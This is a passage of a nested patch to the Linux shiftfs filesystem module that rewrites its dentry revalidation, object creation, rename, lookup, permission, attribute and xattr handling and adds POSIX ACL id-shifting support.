-+	lowerd = d_real(lowerd, inode);
-+	if (lowerd && (!inode || inode == d_inode(lowerd)))
-+		return lowerd;
- 
--	return real;
-+	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
-+	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
-+	return dentry;
- }
- 
- static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_is_negative(lowerd) != d_is_negative(dentry))
- 		return 0;
- 
--	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
-+		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
- 
--	return real->d_op->d_weak_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
-+
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
-+
-+	return err;
- }
- 
- static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int ret;
-+	int err = 1;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 
--	if (d_unhashed(real))
-+	if (d_unhashed(lowerd) ||
-+	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
- 		return 0;
- 
--	/*
--	 * inode state of underlying changed from positive to negative
--	 * or vice versa; force a lookup to update our view
--	 */
--	if (d_is_negative(real) != d_is_negative(dentry))
--		return 0;
-+	if (flags & LOOKUP_RCU)
-+		return -ECHILD;
- 
--	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
--		return 1;
-+	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
-+		err = lowerd->d_op->d_revalidate(lowerd, flags);
- 
--	ret = real->d_op->d_revalidate(real, flags);
-+	if (d_really_is_positive(dentry)) {
-+		struct inode *inode = d_inode(dentry);
-+		struct inode *loweri = d_inode(lowerd);
- 
--	if (ret == 0 && !(flags & LOOKUP_RCU))
--		d_invalidate(real);
-+		shiftfs_copyattr(loweri, inode);
-+		if (!inode->i_nlink)
-+			err = 0;
-+	}
- 
--	return ret;
-+	return err;
- }
- 
- static const struct dentry_operations shiftfs_dentry_ops = {
--	.d_release	= shiftfs_d_release,
--	.d_real		= shiftfs_d_real,
--	.d_revalidate	= shiftfs_d_revalidate,
-+	.d_release	   = shiftfs_d_release,
-+	.d_real		   = shiftfs_d_real,
-+	.d_revalidate	   = shiftfs_d_revalidate,
- 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
- };
- 
--static int shiftfs_readlink(struct dentry *dentry, char __user *data,
--			    int flags)
--{
--	struct dentry *real = dentry->d_fsdata;
--	const struct inode_operations *iop = real->d_inode->i_op;
--
--	if (iop->readlink)
--		return iop->readlink(real, data, flags);
--
--	return -EINVAL;
--}
--
- static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
- 				    struct delayed_call *done)
- {
--	if (dentry) {
--		struct dentry *real = dentry->d_fsdata;
--		struct inode *reali = real->d_inode;
--		const struct inode_operations *iop = reali->i_op;
--		const char *res = ERR_PTR(-EPERM);
--
--		if (iop->get_link)
--			res = iop->get_link(real, reali, done);
-+	const char *p;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd;
- 
--		return res;
--	} else {
--		/* RCU lookup not supported */
-+	/* RCU lookup not supported */
-+	if (!dentry)
- 		return ERR_PTR(-ECHILD);
--	}
-+
-+	lowerd = dentry->d_fsdata;
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	p = vfs_get_link(lowerd, done);
-+	revert_creds(oldcred);
-+
-+	return p;
- }
- 
- static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
- 			    const char *name, const void *value,
- 			    size_t size, int flags)
- {
--	struct dentry *real = dentry->d_fsdata;
--	int err = -EOPNOTSUPP;
--	const struct cred *oldcred, *newcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	int err;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_setxattr(lowerd, name, value, size, flags);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_setxattr(real, name, value, size, flags);
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(lowerd->d_inode, inode);
- 
- 	return err;
- }
-@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- 			     struct dentry *dentry, struct inode *inode,
- 			     const char *name, void *value, size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_getxattr(real, name, value, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_getxattr(lowerd, name, value, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
-@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
- static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
- 				 size_t size)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_listxattr(real, list, size);
--	shiftfs_old_creds(oldcred, &newcred);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_listxattr(lowerd, list, size);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_removexattr(struct dentry *dentry, const char *name)
- {
--	struct dentry *real = dentry->d_fsdata;
-+	struct dentry *lowerd = dentry->d_fsdata;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = vfs_removexattr(lowerd, name);
-+	revert_creds(oldcred);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	err = vfs_removexattr(real, name);
--	shiftfs_old_creds(oldcred, &newcred);
-+	/* update c/mtime */
-+	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
- 
- 	return err;
- }
-@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
- 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
- }
- 
--static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
-+static int shiftfs_inode_test(struct inode *inode, void *data)
- {
--	struct inode *reali;
--
--	if (!dentry)
--		return;
--
--	reali = dentry->d_inode;
--
--	if (!reali->i_op->get_link)
--		inode->i_opflags |= IOP_NOFOLLOW;
-+	return inode->i_private == data;
-+}
- 
--	inode->i_mapping = reali->i_mapping;
--	inode->i_private = dentry;
-+static int shiftfs_inode_set(struct inode *inode, void *data)
-+{
-+	inode->i_private = data;
-+	return 0;
- }
- 
--static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
--			       umode_t mode, const char *symlink,
--			       struct dentry *hardlink, bool excl)
-+static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
-+				 umode_t mode, const char *symlink,
-+				 struct dentry *hardlink, bool excl)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode, *newi;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
--	bool op_ok = false;
-+	const struct cred *oldcred;
-+	struct cred *newcred;
-+	void *loweri_iop_ptr = NULL;
-+	umode_t modei = mode;
-+	struct super_block *dir_sb = diri->i_sb;
-+	struct dentry *lowerd_new = dentry->d_fsdata;
-+	struct inode *inode = NULL, *loweri_dir = diri->i_private;
-+	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
-+	struct dentry *lowerd_link = NULL;
- 
- 	if (hardlink) {
--		op_ok = iop->link;
-+		loweri_iop_ptr = loweri_dir_iop->link;
- 	} else {
- 		switch (mode & S_IFMT) {
- 		case S_IFDIR:
--			op_ok = iop->mkdir;
-+			loweri_iop_ptr = loweri_dir_iop->mkdir;
- 			break;
- 		case S_IFREG:
--			op_ok = iop->create;
-+			loweri_iop_ptr = loweri_dir_iop->create;
- 			break;
- 		case S_IFLNK:
--			op_ok = iop->symlink;
-+			loweri_iop_ptr = loweri_dir_iop->symlink;
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			loweri_iop_ptr = loweri_dir_iop->mknod;
-+			break;
- 		}
- 	}
--	if (!op_ok)
--		return -EINVAL;
-+	if (!loweri_iop_ptr) {
-+		err = -EINVAL;
-+		goto out_iput;
-+	}
- 
-+	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
- 
--	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
--	if (!newi)
--		return -ENOMEM;
-+	if (!hardlink) {
-+		inode = new_inode(dir_sb);
-+		if (!inode) {
-+			err = -ENOMEM;
-+			goto out_iput;
-+		}
-+
-+		/*
-+		 * new_inode() will have added the new inode to the super
-+		 * block's list of inodes. Further below we will call
-+		 * inode_insert5(), which would perform the same operation again,
-+		 * thereby corrupting the list. To avoid this, raise I_CREATING
-+		 * in i_state which will cause inode_insert5() to skip this
-+		 * step. I_CREATING will be cleared by d_instantiate_new()
-+		 * below.
-+		 */
-+		spin_lock(&inode->i_lock);
-+		inode->i_state |= I_CREATING;
-+		spin_unlock(&inode->i_lock);
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+		inode_init_owner(inode, diri, mode);
-+		modei = inode->i_mode;
-+	}
- 
--	inode_lock_nested(reali, I_MUTEX_PARENT);
-+	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
-+					    dentry, modei, hardlink != NULL);
-+	if (err)
-+		goto out_iput;
- 
--	err = -EINVAL;		/* shut gcc up about uninit var */
- 	if (hardlink) {
--		struct dentry *realhardlink = hardlink->d_fsdata;
--
--		err = vfs_link(realhardlink, reali, new, NULL);
-+		lowerd_link = hardlink->d_fsdata;
-+		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
- 	} else {
--		switch (mode & S_IFMT) {
-+		switch (modei & S_IFMT) {
- 		case S_IFDIR:
--			err = vfs_mkdir(reali, new, mode);
-+			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
- 			break;
- 		case S_IFREG:
--			err = vfs_create(reali, new, mode, excl);
-+			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(reali, new, symlink);
-+			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
-+			break;
-+		case S_IFSOCK:
-+			/* fall through */
-+		case S_IFIFO:
-+			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
-+			break;
-+		default:
-+			err = -EINVAL;
-+			break;
- 		}
- 	}
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_revert_object_creds(oldcred, newcred);
- 
-+	if (!err && WARN_ON(!lowerd_new->d_inode))
-+		err = -EIO;
- 	if (err)
--		goto out_dput;
-+		goto out_iput;
-+
-+	if (hardlink) {
-+		inode = d_inode(hardlink);
-+		ihold(inode);
-+
-+		/* copy up times from lower inode */
-+		shiftfs_copyattr(d_inode(lowerd_link), inode);
-+		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
-+		d_instantiate(dentry, inode);
-+	} else {
-+		struct inode *inode_tmp;
-+		struct inode *loweri_new = d_inode(lowerd_new);
-+
-+		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
-+					  shiftfs_inode_test, shiftfs_inode_set,
-+					  loweri_new);
-+		if (unlikely(inode_tmp != inode)) {
-+			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
-+			iput(inode_tmp);
-+			err = -EINVAL;
-+			goto out_iput;
-+		}
- 
--	shiftfs_fill_inode(newi, new);
-+		ihold(loweri_new);
-+		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
-+				   0, lowerd_new);
-+		d_instantiate_new(dentry, inode);
-+	}
- 
--	d_instantiate(dentry, newi);
-+	shiftfs_copyattr(loweri_dir, diri);
-+	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
-+		set_nlink(diri, loweri_dir->i_nlink);
- 
--	new = NULL;
--	newi = NULL;
-+	inode = NULL;
- 
-- out_dput:
--	dput(new);
--	iput(newi);
--	inode_unlock(reali);
-+out_iput:
-+	iput(inode);
-+	inode_unlock(loweri_dir);
- 
- 	return err;
- }
-@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
-@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
-+}
-+
-+static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
-+			 dev_t rdev)
-+{
-+	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
-+		return -EPERM;
-+
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
--	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
- 	int err;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock_nested(reali, I_MUTEX_PARENT);
--
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
-+	const struct cred *oldcred;
- 
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	inode_lock_nested(loweri, I_MUTEX_PARENT);
- 	if (rmdir)
--		err = vfs_rmdir(reali, new);
-+		err = vfs_rmdir(loweri, lowerd);
- 	else
--		err = vfs_unlink(reali, new, NULL);
-+		err = vfs_unlink(loweri, lowerd, NULL);
-+	inode_unlock(loweri);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	shiftfs_copyattr(loweri, dir);
-+	set_nlink(d_inode(dentry), loweri->i_nlink);
-+	if (!err)
-+		d_drop(dentry);
-+
-+	set_nlink(dir, loweri->i_nlink);
- 
- 	return err;
- }
-@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- 			  struct inode *newdir, struct dentry *new,
- 			  unsigned int flags)
- {
--	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
--		*realold = old->d_fsdata,
--		*realnew = new->d_fsdata, *trap;
--	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
-+	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
-+		      *lowerd_dir_new = new->d_parent->d_fsdata,
-+		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
-+		      *trapd;
-+	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
-+		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	int err = -EINVAL;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 
--	trap = lock_rename(rndd, rodd);
-+	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
- 
--	if (trap == realold || trap == realnew)
-+	if (trapd == lowerd_old || trapd == lowerd_new)
- 		goto out_unlock;
- 
--	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
--
--	err = vfs_rename(realolddir, realold, realnewdir,
--			 realnew, NULL, flags);
-+	oldcred = shiftfs_override_creds(old->d_sb);
-+	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
-+			 NULL, flags);
-+	revert_creds(oldcred);
- 
--	shiftfs_old_creds(oldcred, &newcred);
-+	shiftfs_copyattr(loweri_dir_old, olddir);
-+	shiftfs_copyattr(loweri_dir_new, newdir);
- 
-- out_unlock:
--	unlock_rename(rndd, rodd);
-+out_unlock:
-+	unlock_rename(lowerd_dir_new, lowerd_dir_old);
- 
- 	return err;
- }
-@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
- static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
- 				     unsigned int flags)
- {
--	struct dentry *real = dir->i_private, *new;
--	struct inode *reali = real->d_inode, *newi;
--	const struct cred *oldcred, *newcred;
--
--	inode_lock(reali);
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
--	shiftfs_old_creds(oldcred, &newcred);
--	inode_unlock(reali);
-+	struct dentry *new;
-+	struct inode *newi;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_parent->d_fsdata;
-+	struct inode *inode = NULL, *loweri = lowerd->d_inode;
-+
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
- 	if (IS_ERR(new))
- 		return new;
- 
- 	dentry->d_fsdata = new;
- 
--	newi = NULL;
--	if (!new->d_inode)
-+	newi = new->d_inode;
-+	if (!newi)
- 		goto out;
- 
--	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
--	if (!newi) {
-+	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
-+			     shiftfs_inode_test, shiftfs_inode_set, newi);
-+	if (!inode) {
- 		dput(new);
- 		return ERR_PTR(-ENOMEM);
- 	}
-+	if (inode->i_state & I_NEW) {
-+		/*
-+		 * inode->i_private set by shiftfs_inode_set(), but we still
-+		 * need to take a reference
-+		 */
-+		ihold(newi);
-+		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
-+		unlock_new_inode(inode);
-+	}
- 
-- out:
--	return d_splice_alias(newi, dentry);
-+out:
-+	return d_splice_alias(inode, dentry);
- }
- 
- static int shiftfs_permission(struct inode *inode, int mask)
- {
--	struct dentry *real = inode->i_private;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
- 	int err;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
- 
--	if (mask & MAY_NOT_BLOCK)
-+	if (!loweri) {
-+		WARN_ON(!(mask & MAY_NOT_BLOCK));
- 		return -ECHILD;
-+	}
- 
--	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
--	if (iop->permission)
--		err = iop->permission(reali, mask);
--	else
--		err = generic_permission(reali, mask);
--	shiftfs_old_creds(oldcred, &newcred);
-+	err = generic_permission(inode, mask);
-+	if (err)
-+		return err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = inode_permission(loweri, mask);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_fiemap(struct inode *inode,
-+			  struct fiemap_extent_info *fieinfo, u64 start,
-+			  u64 len)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct inode *loweri = inode->i_private;
-+
-+	if (!loweri->i_op->fiemap)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
-+		filemap_write_and_wait(loweri->i_mapping);
-+	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
-+	revert_creds(oldcred);
-+
-+	return err;
-+}
-+
-+static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
-+			   umode_t mode)
-+{
-+	int err;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = dir->i_private;
-+
-+	if (!loweri->i_op->tmpfile)
-+		return -EOPNOTSUPP;
-+
-+	oldcred = shiftfs_override_creds(dir->i_sb);
-+	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
-+	revert_creds(oldcred);
- 
- 	return err;
- }
- 
- static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
--	struct dentry *real = dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
-+	struct dentry *lowerd = dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
- 	struct iattr newattr = *attr;
--	const struct cred *oldcred, *newcred;
-+	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
- 
-+	err = setattr_prepare(dentry, attr);
-+	if (err)
-+		return err;
-+
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
--	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
--	inode_lock(reali);
--	if (iop->setattr)
--		err = iop->setattr(real, &newattr);
--	else
--		err = simple_setattr(real, &newattr);
--	inode_unlock(reali);
--	shiftfs_old_creds(oldcred, &newcred);
-+	inode_lock(loweri);
-+	oldcred = shiftfs_override_creds(dentry->d_sb);
-+	err = notify_change(lowerd, attr, NULL);
-+	revert_creds(oldcred);
-+	inode_unlock(loweri);
- 
--	if (err)
--		return err;
-+	shiftfs_copyattr(loweri, d_inode(dentry));
- 
--	/* all OK, reflect the change on our inode */
--	setattr_copy(d_inode(dentry), attr);
--	return 0;
-+	return err;
- }
- 
- static int shiftfs_getattr(const struct path *path, struct kstat *stat,
- 			   u32 request_mask, unsigned int query_flags)
- {
- 	struct inode *inode = path->dentry->d_inode;
--	struct dentry *real = path->dentry->d_fsdata;
--	struct inode *reali = real->d_inode;
--	const struct inode_operations *iop = reali->i_op;
--	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
--	int err = 0;
--
--	if (iop->getattr)
--		err = iop->getattr(&newpath, stat, request_mask, query_flags);
--	else
--		generic_fillattr(reali, stat);
-+	struct dentry *lowerd = path->dentry->d_fsdata;
-+	struct inode *loweri = lowerd->d_inode;
-+	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
-+	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	const struct cred *oldcred;
-+	int err;
-+
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
-+	revert_creds(oldcred);
- 
- 	if (err)
- 		return err;
- 
- 	/* transform the underlying id */
--	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
--	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
-+	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
-+	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
- 	return 0;
- }
- 
--static const struct inode_operations shiftfs_inode_ops = {
--	.lookup		= shiftfs_lookup,
--	.getattr	= shiftfs_getattr,
--	.setattr	= shiftfs_setattr,
--	.permission	= shiftfs_permission,
--	.mkdir		= shiftfs_mkdir,
--	.symlink	= shiftfs_symlink,
--	.get_link	= shiftfs_get_link,
--	.readlink	= shiftfs_readlink,
--	.unlink		= shiftfs_unlink,
--	.rmdir		= shiftfs_rmdir,
--	.rename		= shiftfs_rename,
--	.link		= shiftfs_link,
--	.create		= shiftfs_create,
--	.mknod		= NULL,	/* no special files currently */
--	.listxattr	= shiftfs_listxattr,
--};
-+#ifdef CONFIG_SHIFT_FS_POSIX_ACL
- 
--static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
--				       struct dentry *dentry)
-+static int
-+shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
-+	      struct posix_acl *acl)
- {
--	struct inode *inode;
--
--	inode = new_inode(sb);
--	if (!inode)
--		return NULL;
--
--	/*
--	 * our inode is completely vestigial.  All lookups, getattr
--	 * and permission checks are done on the underlying inode, so
--	 * what the user sees is entirely from the underlying inode.
--	 */
--	mode &= S_IFMT;
-+	int i;
-+
-+	for (i = 0; i < acl->a_count; i++) {
-+		struct posix_acl_entry *e = &acl->a_entries[i];
-+		switch(e->e_tag) {
-+		case ACL_USER:
-+			e->e_uid = shift_kuid(from, to, e->e_uid);
-+			if (!uid_valid(e->e_uid))
-+				return -EOVERFLOW;
-+			break;
-+		case ACL_GROUP:
-+			e->e_gid = shift_kgid(from, to, e->e_gid);
-+			if (!gid_valid(e->e_gid))
-+				return -EOVERFLOW;
-+			break;
-+		}
-+	}
-+	return 0;
-+}
- 
--	inode->i_ino = get_next_ino();
--	inode->i_mode = mode;
--	inode->i_flags |= S_NOATIME | S_NOCMTIME;
-+static void
-+shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
-+		    void *value, size_t size)
-+{
-+	struct posix_acl_xattr_header *header = value;
-+	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
-+	int count;
-+	kuid_t kuid;
-+	kgid_t kgid;
- 
--	inode->i_op = &shiftfs_inode_ops;
-+	if (!value)
-+		return;
-+	if (size < sizeof(struct posix_acl_xattr_header))
-+		return;
-+	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
-+		return;
- 
--	shiftfs_fill_inode(inode, dentry);
-+	count = posix_acl_xattr_count(size);
-+	if (count < 0)
-+		return;
-+	if (count == 0)
-+		return;
- 
--	return inode;
-+	for (end = entry + count; entry != end; entry++) {
-+		switch(le16_to_cpu(entry->e_tag)) {
-+		case ACL_USER:
-+			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kuid = shift_kuid(from, to, kuid);
-+			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
-+			break;
-+		case ACL_GROUP:
-+			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
-+			kgid = shift_kgid(from, to, kgid);
-+			entry->e_id = cpu_to_le32(from_kgid(&init_user_ns, kgid));
-+			break;
-+		default:
-+			break;
-+		}
-+	}
- }
- 
--static int shiftfs_show_options(struct seq_file *m, struct dentry *dentry)
-+static struct posix_acl *shiftfs_get_acl(struct inode *inode, int type)
- {
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	const struct cred *oldcred;
-+	struct posix_acl *lower_acl, *acl = NULL;
-+	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
-+	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
-+	int size;
-+	int err;
- 
--	if (ssi->mark)
--		seq_show_option(m, "mark", NULL);
-+	if (!IS_POSIXACL(loweri))
-+		return NULL;
- 
--	return 0;
--}
-+	oldcred = shiftfs_override_creds(inode->i_sb);
-+	lower_acl = get_acl(loweri, type);
-+	revert_creds(oldcred);
- 
--static int shiftfs_statfs(struct dentry *dentry, struct kstatfs *buf)
--{
--	struct super_block *sb = dentry->d_sb;
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
--	struct dentry *root = sb->s_root;
--	struct dentry *realroot = root->d_fsdata;
--	struct path realpath = { .mnt = ssi->mnt, .dentry = realroot };
--	int err;
-+	if (lower_acl && !IS_ERR(lower_acl)) {
-+		/* XXX: export posix_acl_clone? */
-+		size = sizeof(struct posix_acl) +
-+		       lower_acl->a_count * sizeof(struct posix_acl_entry);
-+		acl = kmemdup(lower_acl, size, GFP_KERNEL);
-+		posix_acl_release(lower_acl);
- 
--	err = vfs_statfs(&realpath, buf);
--	if (err)
--		return err;
-+		if (!acl)
-+			return ERR_PTR(-ENOMEM);
- 
--	buf->f_type = sb->s_magic;
-+		refcount_set(&acl->a_refcount, 1);
- 
--	return 0;
-+		err = shift_acl_ids(from_ns, to_ns, acl);
-+		if (err) {
-+			kfree(acl);
-+			return ERR_PTR(err);
-+		}
-+	}
-+
-+	return acl;
- }
- 
--static void shiftfs_put_super(struct super_block *sb)
-+static int
-+shiftfs_posix_acl_xattr_get(const struct xattr_handler *handler,
-+			   struct dentry *dentry, struct inode *inode,
-+			   const char *name, void *buffer, size_t size)
- {
--	struct shiftfs_super_info *ssi = sb->s_fs_info;
-+	struct inode *loweri = inode->i_private;
-+	int ret;
-+
-+	ret = shiftfs_xattr_get(NULL, dentry, inode, handler->name,
-+				buffer, size);
-+	if (ret < 0)
-+		return ret;
- 
--	mntput(ssi->mnt);
--	put_user_ns(ssi->userns);
--	kfree(ssi);
-+	inode_lock(loweri);
